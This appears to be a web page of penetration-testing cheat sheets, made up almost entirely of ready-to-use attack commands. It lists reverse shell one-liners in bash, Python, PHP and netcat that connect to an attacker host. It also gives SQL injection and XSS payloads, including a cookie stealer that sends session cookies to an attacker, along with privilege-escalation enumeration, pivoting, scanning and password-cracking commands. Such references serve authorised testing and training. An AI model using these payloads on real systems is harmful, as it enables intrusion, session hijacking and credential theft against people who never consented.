Security Cheat Sheets

Quick reference guides for penetration testing, web exploitation, privilege escalation, and more.

Reverse Shells

Shells

Common reverse shell one-liners for various languages and platforms.

Bash
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
PHP
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat
nc -e /bin/sh ATTACKER_IP PORT

Linux Privilege Escalation

PrivEsc

Quick enumeration commands for Linux privilege escalation.

SUID Binaries
find / -perm -4000 -type f 2>/dev/null
World-Writable Files
find / -writable -type f 2>/dev/null | grep -v proc
Sudo Permissions
sudo -l
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.*
Capabilities
getcap -r / 2>/dev/null

Nmap Scanning

Recon

Essential Nmap commands for network reconnaissance.

Full TCP Scan
nmap -sC -sV -p- -oA full_scan TARGET
UDP Scan (Top 100)
nmap -sU --top-ports 100 -oA udp_scan TARGET
Vulnerability Scan
nmap --script vuln -sV TARGET
Stealth Scan
nmap -sS -Pn -T2 --scan-delay 1s TARGET

SQL Injection

Web

Common SQL injection payloads and bypass techniques.

Authentication Bypass
' OR '1'='1' -- -
Union-Based
' UNION SELECT 1,2,3,user(),database() -- -
Error-Based
' AND extractvalue(1,concat(0x7e,(SELECT @@version))) -- -
sqlmap
sqlmap -u "URL?id=1" --dbs --batch --random-agent

XSS Payloads

Web

Cross-site scripting bypass techniques and payloads.

Basic Alert
<script>alert(document.domain)</script>
SVG Bypass
<svg onload=alert(1)>
IMG Onerror
<img src=x onerror=alert(1)>
Cookie Stealer
<script>new Image().src="http://ATTACKER/c="+document.cookie</script>

Network Pivoting

Network

SSH tunneling, port forwarding, and pivoting techniques.

SSH Local Port Forward
ssh -L LOCAL_PORT:TARGET:TARGET_PORT user@pivot
SSH Dynamic SOCKS Proxy
ssh -D 9050 -N user@pivot
Chisel Server
./chisel server -p 8000 --reverse
Chisel Client
./chisel client ATTACKER:8000 R:SOCKS

Password Cracking

Recon

Offline hash cracking with John the Ripper and Hashcat, plus an online login brute-force example with Hydra.

John with Wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Hashcat MD5
hashcat -m 0 -a 0 hashes.txt rockyou.txt
Hashcat NTLM
hashcat -m 1000 -a 0 hashes.txt rockyou.txt
Hydra SSH Brute
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://TARGET

Windows Privilege Escalation

PrivEsc

Windows enumeration and privilege escalation commands.

System Info
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Current User Privileges
whoami /priv
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated